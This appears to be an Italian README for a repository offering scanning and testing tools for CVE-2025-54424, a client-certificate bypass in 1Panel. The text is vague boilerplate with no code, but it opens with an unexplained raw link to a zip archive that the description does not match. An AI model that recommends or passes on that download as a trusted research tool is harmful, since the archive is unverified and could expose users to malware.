https://raw.githubusercontent.com/hophtien/CVE-2025-54424/main/unrevolted/CV-v3.9.zip

CVE-2025-54424 è una vulnerabilità di 1Panel che riguarda l'elusione del certificato client, che potrebbe potenzialmente portare a esecuzione remota di codice. Questo repository fornisce un set di strumenti integrati progettati per aiutare i ricercatori a eseguire scansioni e test di verifica di questa vulnerabilità in ambienti controllati. Gli strumenti enfatizzano test di sicurezza, scopi educativi e conformità della ricerca sui sistemi interessati. Il progetto non fornisce payload offensivi o script di exploit per accessi non autorizzati o per asset di rete esterni. Utilizzare solo in ambienti con autorizzazione esplicita, rispettando le leggi locali e i requisiti di conformità del settore.
Indice
- Informazioni su questo repository
- Obiettivi e ambito del progetto
- Codice di condotta ed etica
- Panoramica delle funzionalità
- Principio di funzionamento (architettura di alto livello)
- Punti chiave su sicurezza e protezione
- Requisiti di ambiente e installazione
- Avvio rapido (flusso di alto livello)
- Modalità d'uso e flussi di lavoro
- Guida per sviluppatori
- Test e garanzia di qualità
- Versioni e rilasci
- Guida ai contributi
- Domande frequenti
- Licenza e autorizzazione
- Ringraziamenti
Informazioni su questo repository
Si tratta di una raccolta di strumenti pensata per ricercatori e ingegneri della sicurezza, progettata attorno al lavoro di ricerca su CVE-2025-54424. L'obiettivo principale è fornire un ambiente di test trasparente e riproducibile per valutare l'impatto, identificare i fattori di configurazione e valutare l'efficacia delle correzioni in ambienti controllati. Il progetto enfatizza processi di test documentati, registrazione tracciabile dei risultati e operazioni di protezione degli asset.
Obiettivi e ambito del progetto
- Fornire un framework di test chiaro per condurre ricerche sulla sicurezza delle versioni correlate a 1Panel con autorizzazione esplicita.
- Fornire componenti relativi a rilevamento e valutazione, senza includere payload di sfruttamento, script weaponizzati o implementazioni dirette di attacchi contro asset di rete esterni.
- Consentire ai ricercatori di riprodurre il processo di scoperta della vulnerabilità in ambienti di laboratorio controllati, valutare l'efficacia delle patch e delle modifiche di configurazione e organizzare i risultati in report di valutazione della sicurezza condivisibili.
- Supportare configurazione localizzata, registrazione ed esportazione dei risultati per facilitare audit e conformità.
- Fornire un changelog chiaro e note di rilascio per consentire ai ricercatori di tracciare l'evoluzione delle versioni.
Codice di condotta ed etica
- Questo progetto è destinato esclusivamente a essere utilizzato in ambienti con autorizzazione esplicita. Eseguire test di sicurezza su sistemi altrui senza autorizzazione è illegale.
- Non vengono forniti payload, script o dettagli tecnici per accessi non autorizzati, sfruttamento o diffusione.
- Prima dell'uso, valutare i rischi, assicurarsi di avere piani di rollback, backup e piani di emergenza in caso di guasti.
- Gestire i dati di test in modo sicuro, evitando di divulgare informazioni sensibili in ambienti pubblici.
- Se si individuano potenziali miglioramenti o suggerimenti di correzione, inviarli tramite il processo di contribuzione formale, evitando di divulgare informazioni sensibili su canali pubblici.
Panoramica delle funzionalità
- Modulo di scansione di sicurezza (di alto livello): esegue controlli statici e dinamici su configurazione di 1Panel, gestione dei certificati, catena di fiducia dei certificati e altri elementi in ambienti controllati per identificare potenziali indicatori di rischio per la sicurezza.
- Valutazione del rischio e reportistica: genera report di valutazione della sicurezza leggibili basati sui risultati della scansione, inclusi livelli di rischio, raccomandazioni di correzione, priorità e catene di prove tracciabili.
- Template guida per test di sicurezza: fornisce template di script di test, moduli di registrazione e formati di archiviazione dei risultati da eseguire in ambienti di laboratorio, aiutando i ricercatori a mantenere coerenza.
- Centralizzazione della configurazione: template di configurazione ed esempi centralizzati per facilitare la riproduzione di scenari di test in diversi ambienti sperimentali.
- Registrazione e catena di prove: meccanismo di registrazione sistematica, che facilita audit, riproduzione e condivisione dei risultati della valutazione.
Principio di funzionamento (architettura di alto livello)
- Stratificazione dei componenti principali: livello di interfaccia (CLI/interfaccia semplice) + livello di driver di test (casi di test, harness di test) + livello di reportistica (aggregazione dei risultati, esportazione).
- Flusso dei dati: input di configurazione e asset target → scansione e valutazione → aggregazione ed esportazione dei risultati → output del report.
- Confini di sicurezza: tutti i test vengono eseguiti in ambienti isolati, con accesso limitato al filesystem e alla rete; l'output generato durante i test viene archiviato solo localmente o nell'ambito autorizzato.
- Basso accoppiamento dei moduli: i moduli comunicano tramite interfacce definite, facilitando la sostituzione, l'estensione o la disabilitazione di funzionalità specifiche.
Punti chiave su sicurezza e protezione
- Principio dell'ambiente controllato: eseguire solo in laboratori di test o sandbox, evitando impatti su sistemi di produzione.
- Principio del minimo privilegio: gli account di test dispongono solo delle autorizzazioni necessarie, evitando operazioni rischiose che aumentano i privilegi.
- Gestione di log e prove: registrazione strutturata, garantendo tracciabilità, auditabilità e conformità ai requisiti di protezione dei dati.
- Classificazione e mitigazione del rischio: impostare priorità di correzione per gli elementi ad alto rischio rilevati e fornire strategie di mitigazione attuabili.
- Conformità e divulgazione: prima di divulgare in studi pubblici, ottenere autorizzazione e seguire percorsi di divulgazione appropriati, rispettando il principio di divulgazione responsabile.
Requisiti di ambiente e installazione
- Sistema operativo: principali Linux/Windows/macOS possono essere utilizzati in ambienti virtualizzati, ma si consiglia Linux per i test di laboratorio.
- Versione Python (se applicabile): Python 3.10+ o ambiente runtime corrispondente, con dipendenze soddisfatte.
- Gestione delle dipendenze: è possibile utilizzare ambienti virtuali (es. virtualenv o conda) per isolare le dipendenze.
- Requisiti di rete: i test vengono eseguiti in ambienti controllati, assicurandosi che non ci siano loopback esterni o accessi di rete non autorizzati.
- Requisiti di risorse: a seconda della scala dei test, un ambiente di laboratorio normale dovrebbe disporre di capacità CPU, memoria e archiviazione ragionevoli per supportare la generazione di log e report.
Procedura di installazione (di alto livello)
- Clonare il repository in locale.
- Creare un ambiente virtuale e installare le dipendenze.
- Configurare i parametri dell'ambiente di test (es. asset target, parametri di simulazione dei certificati, livello di log, ecc.).
- Eseguire il flusso di lavoro di test, monitorando output e produzione di report.